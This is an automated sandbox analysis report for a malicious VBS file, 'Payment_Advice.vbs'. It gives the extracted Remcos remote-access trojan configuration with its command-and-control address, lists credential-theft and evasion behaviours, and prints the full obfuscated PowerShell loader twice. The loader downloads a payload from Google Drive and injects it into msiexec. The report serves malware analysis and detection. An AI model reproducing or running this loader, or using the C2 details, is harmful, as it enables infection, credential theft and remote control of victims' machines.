Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
Payment_Advice.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Payment_Advice.vbs
Resource
win10v2004-20241007-en
General
-
Target
Payment_Advice.vbs
-
Size
13KB
-
MD5
ce76fce7bb9efe32690687720945a588
-
SHA1
3973db2472d805fa2d63909b039d099e7ad719ca
-
SHA256
aa45711675046342a10174fe5e6de73d12a9ad917d993b85c9fa0dea64f30ed8
-
SHA512
0aec07127e40478eb2217b5e23331422d201b428e00ee9f42f59e5790f696edac680067188348827048cff4d959f342aa0b889b2d57ca9d2fdae9500483f1ca1
-
SSDEEP
384:gq5TlOXg09fdy5iHz3sPQ3uROvIWdZrVspv7x:gK5OXV9FMiT82uRiI+Zu3
Malware Config
Extracted
remcos
RemoteHost
154.216.17.190:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-3W6OXK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4344-73-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4352-74-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2764-72-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4352-74-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4344-73-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 10 IoCs
flow pid Process 16 4952 powershell.exe 18 4952 powershell.exe 29 3980 msiexec.exe 31 3980 msiexec.exe 33 3980 msiexec.exe 35 3980 msiexec.exe 41 3980 msiexec.exe 49 3980 msiexec.exe 50 3980 msiexec.exe 52 3980 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 4952 powershell.exe 1340 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 29 drive.google.com 14 drive.google.com 16 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3980 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1340 powershell.exe 3980 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3980 set thread context of 4344 3980 msiexec.exe 104 PID 3980 set thread context of 4352 3980 msiexec.exe 105 PID 3980 set thread context of 2764 3980 msiexec.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4952 powershell.exe 4952 powershell.exe 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 2764 msiexec.exe 2764 msiexec.exe 4344 msiexec.exe 4344 msiexec.exe 4344 msiexec.exe 4344 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1340 powershell.exe 3980 msiexec.exe 3980 msiexec.exe 3980 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 2764 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4716 wrote to memory of 4952 4716 WScript.exe 84 PID 4716 wrote to memory of 4952 4716 WScript.exe 84 PID 1340 wrote to memory of 3980 1340 powershell.exe 99 PID 1340 wrote to memory of 3980 1340 powershell.exe 99 PID 1340 wrote to memory of 3980 1340 powershell.exe 99 PID 1340 wrote to memory of 3980 1340 powershell.exe 99 PID 3980 wrote to memory of 4344 3980 msiexec.exe 104 PID 3980 wrote to memory of 4344 3980 msiexec.exe 104 PID 3980 wrote to memory of 4344 3980 msiexec.exe 104 PID 3980 wrote to memory of 4344 3980 msiexec.exe 104 PID 3980 wrote to memory of 4352 3980 msiexec.exe 105 PID 3980 wrote to memory of 4352 3980 msiexec.exe 105 PID 3980 wrote to memory of 4352 3980 msiexec.exe 105 PID 3980 wrote to memory of 4352 3980 msiexec.exe 105 PID 3980 wrote to memory of 2764 3980 msiexec.exe 106 PID 3980 wrote to memory of 2764 3980 msiexec.exe 106 PID 3980 wrote to memory of 2764 3980 msiexec.exe 106 PID 3980 wrote to memory of 2764 3980 msiexec.exe 106
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Advice.vbs"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Reconstrue='sheeter';;$Cleuch='sylfers';;$Photochromascope='straightforwardness';;$alphamerical='Daughterly';;$samflelses=$host.Name;function salvers165($Pseudointellectuals){If ($samflelses) {$subdolous=3} for ($Konsekvensrettelsernes=$subdolous;;$Konsekvensrettelsernes+=4){if(!$Pseudointellectuals[$Konsekvensrettelsernes]){$Gteskabslignende120++;break }$spandets64+=$Pseudointellectuals[$Konsekvensrettelsernes];$Anticrepuscule='Khedah'}$spandets64}function Unrecruited($uldered){ .($Underkjolers) ($uldered)}$Roundure=salvers165 'kalnskrEMisTBru.MarW';$Roundure+=salvers165 'Mu,eswebBibCsubl AuIAn EPreNCteT';$Maskinafdelingens207=salvers165 ' eM JooT rzBedi TylForl .laGe,/';$Richmondena=salvers165 'AkiTTopl LusGor1Bru2';$Quartetto='st [F,ynWadEsubTFo .Antso eEPhyRKisV bsisegcskiEB,vPUdsoRe.IDisN BaT eMDifaFannWatasyngR kEMagR D ] st:un :D us aE HecLamu Afr I,i,retsmey .ap I RAr.OFest PiO EmcU ooKnyLTis=.is$ s r iliAanC lahAglm .uo itN AtD U eHamn haa';$Maskinafdelingens207+=salvers165 's r5Afs.Pro0 To Uvi(sigWnoniB fn stdUdmo NowUnjsRes rejNGrnTDin Cha1Ba,0Man.A i0T.l;Unt styWFarisekn.nk6Ant4paa;Gri TilxFr,6 Ny4Til; se No rFoovka,:Eks1Opg3Gtt1 Ro. De0 o) Bl heGfgteCitc rkOffoFo,/Rou2 i0 Fr1Fo.0Ris0 n1,xp0Joi1 sl PrjF T iDokr oceTakf d,odrox e/r.t1spo3Hvi1 r.Thr0';$Jomfruer=salvers165 'Ba uKo,sFlgeKimrstn-PouARiogPolEfejnFreT';$Infernalizes=salvers165 ' ahIndtmist egpGawsOs :Hol/ses/Mo dUntrUpgi onvProeRke.DasgForoFe o Nog EmlcomePhr. GecTraoHypm ,a/ P u G cVis?Uhle lex olpstuoIncrChuteft=MdedRedo KawF,enChelsouo FiaProdTa &Omdi pidPhy= ha1B,gkColGUn,BAfmAsto7Ca iCoph BeAr,dvJ htW iA VanWoo7spe9sd J Puk KaT FiR ioyCho6Va Asig3 skHMan3C uBKolEEn,yReslsta4Ka nEksVUn m';$Unseeing=salvers165 'sho>';$Underkjolers=salvers165 ' hiCabEB ax';$Forraa='Unreposed';$Hyperdemocratic='\Ddningehoveds28.Out';Unrecruited (salvers165 ' Op$FlaGH lLT to.rub saa RaLDr :.erpChrY NaXBlo= Re$ I eDuanA,tv,ev:UraANo PP,rPAfbD GhAPantP,sA Re+ me$sc,H stY yrPRose erRbemdU beCh mModoskrC.elrForA UrtsteILydc');Unrecruited (salvers165 'Psy$WilGPr.lstaOOn.bOtoaTanlOpt:Ac bTaaIJasDT nRskrO FoNFornL,nId aN sjgDutEscyNLys= en$ ,vI.luNOpfF ,aEkolR ton BuaLanlArviRenz InEdiss Da. MisTrmPE elOveIfirtA,o(Tyr$ eduAranB ssU,seb iEConi LanImmGFor)');Unrecruited (salvers165 $Quartetto);$Infernalizes=$bidronningen[0];$Phalangidea=(salvers165 ' Ho$ roGFillso,o Kab s a HeLOpb:Muif icrUnaILa E Huds,aROveIImpcUdshBems Pa1Vge9m k5Par=BisNproEMisWEft-ThaOGl BKlejCsaeJ.scHeaTTar Ko s nlYovesGstTTe.e tjmGgl..fu$Gyvrexto AfuMe nN,nDRavUUn rstiE');Unrecruited ($Phalangidea);Unrecruited (salvers165 'Roo$swiFExersk.i E esmid her NaiCelcGr h L sAfv1 e9sar5Unm.JasH jieAusaIond voeNonr nks.sc[Ant$DeeJDyfoRelmscefBotrslauEdee aar ad]Inh=Akk$Ca,MPloaD bsG nkBatiDagnMisa M fd.odUdae Afl R,iKo n BagBene Trn.ubsCla2 ,r0 Ko7');$Kvadrattal=salvers165 'Be.$Kl Fga rs lide.e prdid.r aliOv c ush,ncsUnd1Ove9san5 Ba.RemDObsoGedwAkvnChilstaostea ThdsamFUdfiPollR.seT o( Pa$ l I J n nafInseAc,r Jan.ovaC,nlKriiRenz nye Fas Bo,Ame$ paHCi,a TilKasvbe,rsk iRupmTuk)';$Halvrim=$Pyx;Unrecruited (salvers165 'Eld$G rg.piLA.fo UnBK.uaC.mLUnl:afbMOw,a Twg,neT D fDadu AdL ThDUnaTEnf=Kla(FretP oe mpsspatbi -Be,p ChaLi t nHAfk Ksn$ I HToea eLB svsliRRakI im Co)');while (!$Magtfuldt) {Unrecruited (salvers165 'a.o$ Degsp l P oHetbse aNonlRef: itsB.eoPrelH,ri ildnoniPres irmFo.= s,$ UnTcoma KobBe,lAntesw.cgobl UnoF ott,ahFras') ;Unrecruited $Kvadrattal;Unrecruited (salvers165 'R,ds E TDevaTakR FlTpne-.ros ChLMumEEtaEL aP i dik4');Unrecruited (salvers165 'L,d$ spG BrlLyno sib AnABeglPro: Crm suA ChGAbotH.lf HeuPowls gdVeltU.v= mm(As TMumE ars svT Wi-De,PUndaVext ClHseg sko$se.hC la PfLA eVH tr MyI ArmPh )') ;Unrecruited (salvers165 'ser$Ek gGlyLCeloI nBDynaMunlBl.: O vFolELogRcysvsa I FonRe,EG b=Aku$JumgGgel ogOIndB ia plLG d:OilPTrahFinAOven X.EkulRHypoTr s LuimajsWyc2 Ko1Chi8 d+Glo+ Re%Fre$ w b abiVapDd nr Teo h.NsenNR ti TinP lGCedeWoonsol.ButCUsaoLucUTaknoveT') ;$Infernalizes=$bidronningen[$Vervine]}$Attributvrdier=297319;$Rakkerkulen=29575;Unrecruited (salvers165 ' En$Arcg Lal Kaospob ra B.lDef:BelralloNdtnR kdAdvOpr,EA cN LosThu God=Are ProGEupeActT I.- brc UmoGenNBiltPr.EImpNKe,t ,n sm $ BeHTopa ol isvA.srUntINsvM');Unrecruited (salvers165 'Out$ProgVael R o.iebUnsaRetlMuc:ConOChrfNarf Em .ir=Bow ste[C.ns ndyFors itB geH.lm .t.O oCstooAfknsemvEskeDefrBrdtU r]Non:Ln,: isFEdorsp.oPubm FlB f aBresIr e il6 a4 unsProtTanrst,i elnabsgNon(,on$sarRP.no RenF ed Dao NgeFr n W sFri)');Unrecruited (salvers165 'Til$ aG rtLsk,OslebPoka MiLInd:L,pbObrLT,nU s E.orBFreI kr .ed e sky=Unt Vin[PnesGe.Y Mes U,tBe,eDiemNyh.skrTgreE U,xTesTDam.WateskrNKonc MaOsovDTesiU.bNTorgBve]Gu,:A,s:frea aus T.COrgIsilIege.NongDorEForT.nrsRo T farAntIAguNOpmgMyc(N n$ LooOysFDekF on)');Unrecruited (salvers165 'slu$strgsynLUncoFoobAn,a nLMl :sens C EfriA OrGArrOHusI FonBrtgOve=Mod$TunbEngLA cusaleFotBPolIFo r LidRes.DiksBytUGribFrdsd mTL uREleI ltnsimGTra(Kmp$ OpAOuttConT scr AniRb BRifURhiTConv UdrI dD,uni .oeTesrRid,Fl,$bouRUd.AArbKPink RiE.hiR ikA auButLDdseantnRe )');Unrecruited $seagoing;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Reconstrue='sheeter';;$Cleuch='sylfers';;$Photochromascope='straightforwardness';;$alphamerical='Daughterly';;$samflelses=$host.Name;function salvers165($Pseudointellectuals){If ($samflelses) {$subdolous=3} for ($Konsekvensrettelsernes=$subdolous;;$Konsekvensrettelsernes+=4){if(!$Pseudointellectuals[$Konsekvensrettelsernes]){$Gteskabslignende120++;break }$spandets64+=$Pseudointellectuals[$Konsekvensrettelsernes];$Anticrepuscule='Khedah'}$spandets64}function Unrecruited($uldered){ .($Underkjolers) ($uldered)}$Roundure=salvers165 'kalnskrEMisTBru.MarW';$Roundure+=salvers165 'Mu,eswebBibCsubl AuIAn EPreNCteT';$Maskinafdelingens207=salvers165 ' eM JooT rzBedi TylForl .laGe,/';$Richmondena=salvers165 'AkiTTopl LusGor1Bru2';$Quartetto='st [F,ynWadEsubTFo .Antso eEPhyRKisV bsisegcskiEB,vPUdsoRe.IDisN BaT eMDifaFannWatasyngR kEMagR D ] st:un :D us aE HecLamu Afr I,i,retsmey .ap I RAr.OFest PiO EmcU ooKnyLTis=.is$ s r iliAanC lahAglm .uo itN AtD U eHamn haa';$Maskinafdelingens207+=salvers165 's r5Afs.Pro0 To Uvi(sigWnoniB fn stdUdmo NowUnjsRes rejNGrnTDin Cha1Ba,0Man.A i0T.l;Unt styWFarisekn.nk6Ant4paa;Gri TilxFr,6 Ny4Til; se No rFoovka,:Eks1Opg3Gtt1 Ro. De0 o) Bl heGfgteCitc rkOffoFo,/Rou2 i0 Fr1Fo.0Ris0 n1,xp0Joi1 sl PrjF T iDokr oceTakf d,odrox e/r.t1spo3Hvi1 r.Thr0';$Jomfruer=salvers165 'Ba uKo,sFlgeKimrstn-PouARiogPolEfejnFreT';$Infernalizes=salvers165 ' ahIndtmist egpGawsOs :Hol/ses/Mo dUntrUpgi onvProeRke.DasgForoFe o Nog EmlcomePhr. GecTraoHypm ,a/ P u G cVis?Uhle lex olpstuoIncrChuteft=MdedRedo KawF,enChelsouo FiaProdTa &Omdi pidPhy= ha1B,gkColGUn,BAfmAsto7Ca iCoph BeAr,dvJ htW iA VanWoo7spe9sd J Puk KaT FiR ioyCho6Va Asig3 skHMan3C uBKolEEn,yReslsta4Ka nEksVUn m';$Unseeing=salvers165 'sho>';$Underkjolers=salvers165 ' hiCabEB ax';$Forraa='Unreposed';$Hyperdemocratic='\Ddningehoveds28.Out';Unrecruited (salvers165 ' Op$FlaGH lLT to.rub saa RaLDr :.erpChrY NaXBlo= Re$ I eDuanA,tv,ev:UraANo PP,rPAfbD GhAPantP,sA Re+ me$sc,H stY yrPRose erRbemdU beCh mModoskrC.elrForA UrtsteILydc');Unrecruited (salvers165 'Psy$WilGPr.lstaOOn.bOtoaTanlOpt:Ac bTaaIJasDT nRskrO FoNFornL,nId aN sjgDutEscyNLys= en$ ,vI.luNOpfF ,aEkolR ton BuaLanlArviRenz InEdiss Da. MisTrmPE elOveIfirtA,o(Tyr$ eduAranB ssU,seb iEConi LanImmGFor)');Unrecruited (salvers165 $Quartetto);$Infernalizes=$bidronningen[0];$Phalangidea=(salvers165 ' Ho$ roGFillso,o Kab s a HeLOpb:Muif icrUnaILa E Huds,aROveIImpcUdshBems Pa1Vge9m k5Par=BisNproEMisWEft-ThaOGl BKlejCsaeJ.scHeaTTar Ko s nlYovesGstTTe.e tjmGgl..fu$Gyvrexto AfuMe nN,nDRavUUn rstiE');Unrecruited ($Phalangidea);Unrecruited (salvers165 'Roo$swiFExersk.i E esmid her NaiCelcGr h L sAfv1 e9sar5Unm.JasH jieAusaIond voeNonr nks.sc[Ant$DeeJDyfoRelmscefBotrslauEdee aar ad]Inh=Akk$Ca,MPloaD bsG nkBatiDagnMisa M fd.odUdae Afl R,iKo n BagBene Trn.ubsCla2 ,r0 Ko7');$Kvadrattal=salvers165 'Be.$Kl Fga rs lide.e prdid.r aliOv c ush,ncsUnd1Ove9san5 Ba.RemDObsoGedwAkvnChilstaostea ThdsamFUdfiPollR.seT o( Pa$ l I J n nafInseAc,r Jan.ovaC,nlKriiRenz nye Fas Bo,Ame$ paHCi,a TilKasvbe,rsk iRupmTuk)';$Halvrim=$Pyx;Unrecruited (salvers165 'Eld$G rg.piLA.fo UnBK.uaC.mLUnl:afbMOw,a Twg,neT D fDadu AdL ThDUnaTEnf=Kla(FretP oe mpsspatbi -Be,p ChaLi t nHAfk Ksn$ I HToea eLB svsliRRakI im Co)');while (!$Magtfuldt) {Unrecruited (salvers165 'a.o$ Degsp l P oHetbse aNonlRef: itsB.eoPrelH,ri ildnoniPres irmFo.= s,$ UnTcoma KobBe,lAntesw.cgobl UnoF ott,ahFras') ;Unrecruited $Kvadrattal;Unrecruited (salvers165 'R,ds E TDevaTakR FlTpne-.ros ChLMumEEtaEL aP i dik4');Unrecruited (salvers165 'L,d$ spG BrlLyno sib AnABeglPro: Crm suA ChGAbotH.lf HeuPowls gdVeltU.v= mm(As TMumE ars svT Wi-De,PUndaVext ClHseg sko$se.hC la PfLA eVH tr MyI ArmPh )') ;Unrecruited (salvers165 'ser$Ek gGlyLCeloI nBDynaMunlBl.: O vFolELogRcysvsa I FonRe,EG b=Aku$JumgGgel ogOIndB ia plLG d:OilPTrahFinAOven X.EkulRHypoTr s LuimajsWyc2 Ko1Chi8 d+Glo+ Re%Fre$ w b abiVapDd nr Teo h.NsenNR ti TinP lGCedeWoonsol.ButCUsaoLucUTaknoveT') ;$Infernalizes=$bidronningen[$Vervine]}$Attributvrdier=297319;$Rakkerkulen=29575;Unrecruited (salvers165 ' En$Arcg Lal Kaospob ra B.lDef:BelralloNdtnR kdAdvOpr,EA cN LosThu God=Are ProGEupeActT I.- brc UmoGenNBiltPr.EImpNKe,t ,n sm $ BeHTopa ol isvA.srUntINsvM');Unrecruited (salvers165 'Out$ProgVael R o.iebUnsaRetlMuc:ConOChrfNarf Em .ir=Bow ste[C.ns ndyFors itB geH.lm .t.O oCstooAfknsemvEskeDefrBrdtU r]Non:Ln,: isFEdorsp.oPubm FlB f aBresIr e il6 a4 unsProtTanrst,i elnabsgNon(,on$sarRP.no RenF ed Dao NgeFr n W sFri)');Unrecruited (salvers165 'Til$ aG rtLsk,OslebPoka MiLInd:L,pbObrLT,nU s E.orBFreI kr .ed e sky=Unt Vin[PnesGe.Y Mes U,tBe,eDiemNyh.skrTgreE U,xTesTDam.WateskrNKonc MaOsovDTesiU.bNTorgBve]Gu,:A,s:frea aus T.COrgIsilIege.NongDorEForT.nrsRo T farAntIAguNOpmgMyc(N n$ LooOysFDekF on)');Unrecruited (salvers165 'slu$strgsynLUncoFoobAn,a nLMl :sens C EfriA OrGArrOHusI FonBrtgOve=Mod$TunbEngLA cusaleFotBPolIFo r LidRes.DiksBytUGribFrdsd mTL uREleI ltnsimGTra(Kmp$ OpAOuttConT scr AniRb BRifURhiTConv UdrI dD,uni .oeTesrRid,Fl,$bouRUd.AArbKPink RiE.hiR ikA auButLDdseantnRe )');Unrecruited $seagoing;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\akzvtixqezzekccexyn"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\leeguaisrirjmiyipjhkvc"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4352
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vyjyuttlfqjoxwnuytudghlbma"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
425KB
MD56039e4294a26bb71dbbccf1afe0f608a
SHA1eefc3a55e6d749fbb66898aca6daf975be917d50
SHA2569f9a9850035aa528b4dc8d4591abe0c44d0b4bcd85c0259f5654836a930d3039
SHA51284004b583a445f29222e993d9c6c9f8ca468ee8bb4db21170d3fe9fbc16dec97ddca9c7d5bede47a1c93177a1866eaa376f0814e4119a05d2ec5a35eccb1e90d